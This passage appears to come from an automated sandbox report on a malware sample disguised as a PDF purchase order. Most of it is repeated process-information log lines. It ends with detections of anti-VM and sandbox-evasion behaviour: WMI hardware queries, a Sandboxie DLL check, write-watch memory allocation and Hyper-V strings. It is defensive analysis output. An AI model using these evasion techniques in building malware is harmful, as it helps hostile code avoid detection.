Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: RFQ__PO_PO 24090041-PDF____PDF.exe PID: 6204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 6192, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Afoagcjtqvi.exe PID: 824, type: MEMORYSTR
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.0000000003138000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory allocated: 1180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory allocated: 2BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Memory allocated: 29E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2390000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2580000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 23B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 2EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 30F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 50F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 740000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2540000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 23A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 2A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 2C70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Memory allocated: 4C70000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2670000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 27B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 47B0000 memory reserve | memory write watch
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: InstallUtil.exe, 00000001.00000002.1886447454.00000000006FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: InstallUtil.exe, 00000008.00000002.2986413630.0000000005D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
